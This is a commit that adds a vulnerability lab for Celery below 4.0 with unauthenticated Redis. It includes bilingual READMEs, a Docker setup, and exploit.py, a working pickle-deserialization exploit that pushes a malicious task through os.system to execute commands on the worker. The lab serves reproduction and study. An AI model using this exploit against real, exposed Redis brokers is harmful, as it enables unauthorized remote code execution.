first commit

celery/celery3_redis_unauth/README.md

@@ -0,0 +1,56 @@
+# Celery <4.0 Redis unauthorized access + Pickle deserialization exploit
+
+[中文版本(Chinese version)](./README.zh-cn.md)
+
+Celery is a simple, flexible, and reliable distributed system that processes a large number of messages while providing the tools needed to operate and maintain such a system. It is a task queue focused on real-time processing and also supports task scheduling.
+
+In Celery <4.0 version, Pickle is used by default for serialized task messages. When the queue service（e.g. Redis/RabbitMQ/RocketMQ ） used has an unauthorized access problem, the Pickle deserialization vulnerability can be used to execute arbitrary code.
+
+## Vulnerability Environment
+
+Execute the following command to start Celery 3.1.23 + Redis:
+
+```bash
+docker compose up -d
+```
+
+## Exploit
+
+The exploit script `exploit.py` only supports use under python3
+
+```bash
+pip install redis
+python exploit.py [Host IP]
+```
+
+View Results：
+
+```
+docker compose logs celery
+```
+
+You can see the following task message error：
+
+![](a.png)
+
+```bash
+docker compose exec celery ls -l /tmp
+```
+
+You can see that the file `celery_success` was successfully created
+
+![](b.png)
+
+## Reference
+
+https://docs.celeryproject.org/en/stable/userguide/configuration.html
+
+https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk
+
+https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers
+
+https://www.jianshu.com/p/52552c075bc0
+
+https://www.runoob.com/w3cnote/python-redis-intro.html
+
+https://blog.csdn.net/SKI_12/article/details/85015803

celery/celery3_redis_unauth/README.zh-cn.md

@@ -0,0 +1,54 @@
+# Celery <4.0 Redis未授权访问+Pickle反序列化利用
+
+Celery 是一个简单、灵活且可靠的分布式系统，用于处理大量消息，同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列，同时也支持任务调度。
+
+在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递，当所用队列服务（比如Redis、RabbitMQ、RocketMQ等等等）存在未授权访问问题时，可利用Pickle反序列化漏洞执行任意代码。
+
+## 漏洞环境
+
+执行如下命令启动Celery 3.1.23 + Redis：
+
+```bash
+docker compose up -d
+```
+
+## 漏洞复现
+
+漏洞利用脚本`exploit.py`仅支持在python3下使用
+
+```bash
+pip install redis
+python exploit.py [主机IP]
+```
+
+查看结果：
+
+```
+docker compose logs celery
+```
+
+可以看到如下任务消息报错：
+
+![](a.png)
+
+```bash
+docker compose exec celery ls -l /tmp
+```
+
+可以看到成功创建了文件`celery_success`
+
+![](b.png)
+
+## 参考
+
+https://docs.celeryproject.org/en/stable/userguide/configuration.html
+
+https://www.bookstack.cn/read/celery-3.1.7-zh/8d5b10e3439dbe1f.md#dhfmrk
+
+https://docs.celeryproject.org/en/stable/userguide/calling.html#serializers
+
+https://www.jianshu.com/p/52552c075bc0
+
+https://www.runoob.com/w3cnote/python-redis-intro.html
+
+https://blog.csdn.net/SKI_12/article/details/85015803

celery/celery3_redis_unauth/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '2'
+services:
+  redis:
+    image: redis
+    ports:
+      - 6379:6379
+  celery:
+    image: vulhub/celery:3.1.23
+    volumes:
+      - .:/home/user
+    command: "celery -A tasks worker -l debug"
+    links: 
+      - redis
+    environment:
+      CELERY_BROKER_URL: redis://redis/0

celery/celery3_redis_unauth/exploit.py

@@ -0,0 +1,18 @@
+import pickle
+import json
+import base64
+import redis
+import sys
+r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
+
+ori_str="{\"content-type\": \"application/x-python-serialize\", \"properties\": {\"delivery_tag\": \"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\", \"reply_to\": \"9edb8565-0b59-3389-944e-a0139180a048\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"delivery_info\": {\"routing_key\": \"celery\", \"priority\": 0, \"exchange\": \"celery\"}, \"correlation_id\": \"6e046b48-bca4-49a0-bfa7-a92847216999\"}, \"headers\": {}, \"content-encoding\": \"binary\", \"body\": \"gAJ9cQAoWAMAAABldGFxAU5YBQAAAGNob3JkcQJOWAQAAABhcmdzcQNLZEvIhnEEWAMAAAB1dGNxBYhYBAAAAHRhc2txBlgJAAAAdGFza3MuYWRkcQdYAgAAAGlkcQhYJAAAADZlMDQ2YjQ4LWJjYTQtNDlhMC1iZmE3LWE5Mjg0NzIxNjk5OXEJWAgAAABlcnJiYWNrc3EKTlgJAAAAdGltZWxpbWl0cQtOToZxDFgGAAAAa3dhcmdzcQ19cQ5YBwAAAHRhc2tzZXRxD05YBwAAAHJldHJpZXNxEEsAWAkAAABjYWxsYmFja3NxEU5YBwAAAGV4cGlyZXNxEk51Lg==\"}"
+task_dict = json.loads(ori_str)
+command = 'touch /tmp/celery_success'
+class Person(object):
+    def __reduce__(self):
+    	# 未导入os模块，通用
+    	return (__import__('os').system, (command,))
+pickleData = pickle.dumps(Person())
+task_dict['body']=base64.b64encode(pickleData).decode()
+print(task_dict)
+r.lpush('celery',json.dumps(task_dict))

celery/celery3_redis_unauth/tasks.py

@@ -0,0 +1,6 @@
+from celery import Celery
+app = Celery('tasks', broker='redis://redis/0',backend='redis://redis/1')
+app.conf['CELERY_ACCEPT_CONTENT'] = ['pickle', 'json', 'msgpack', 'yaml']
+@app.task
+def add(x, y):
+    return x + y